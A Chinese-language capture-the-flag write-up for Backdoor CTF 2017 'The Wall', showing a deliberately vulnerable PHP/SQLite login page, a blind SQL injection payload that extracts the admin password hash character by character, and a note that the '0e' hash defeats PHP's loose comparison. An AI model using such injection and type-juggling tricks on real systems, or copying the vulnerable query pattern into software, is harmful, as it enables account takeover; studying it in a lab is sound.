backdoor ctf 2017 THE WALL

主页 关于 友链

打开页面发现是一个登陆框,在登陆框下面有一个连接,点开发现是index.php的源码

include 'flag.php';
if(isset($_REQUEST['life'])&&isset($_REQUEST['soul'])){
    $username = $_REQUEST['life'];
    $password = $_REQUEST['soul'];
    if(!(is_string($username)&&is_string($password))){
        header( "refresh:1;url=login.html");
        die("You are not allowed south of wall");
    }
    $password = md5($password);
    include 'connection.php';
    /*CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,role TEXT)*/
    $message = "";
    if(preg_match('/(union|\|)/i', $username)){
        $message="Dead work alone not in UNIONs"."</br>";
        echo $message;
        die();
    }
    $query = "SELECT * FROM users WHERE username='$username'";
    $result = $pdo->query($query);
    $users = $result->fetchArray(SQLITE3_ASSOC);
    if($users) {
        if($password == $users['password']){
            if($users['role']=="admin"){
                echo "Here is your flag: $flag";
            }elseif($users['role']=="normal"){
                $message = "Welcome, ".$users['users']."</br>";
                $message.= "Unfortunately, only Lord Commander can access flag";
            }else{
                $message = "What did you do?";
            }
        }
        else{
            $message = "Wrong identity for : ".$users['username'];
        }
    }
    else{
        $message = "No such person exists"."<br>";
    }
    echo $message;
}else{
    header( "refresh:1;url=login.html");
    die("Only living can cross The Wall");
}

发现是使用的sqlite,只做了一点微小的过滤,union|都不能用了,因为特别过滤了union,而且下方有个密码比较,所以一直在想到底是不是考的没有union的查询

测了大半天后gg,于是决定试试先注点数据

7d557ca810524d1f6d07bbfe47d305f1.png

然后决定尝试注出管理员的密码看看是不是能解开

LordCommander' and (select hex(lower(substr(password,1,1))) from users where username='LordCommander') = hex('0')--

发现密码是0e565041023046045310587974628079,那么

$password == $users['password']

就很好绕过了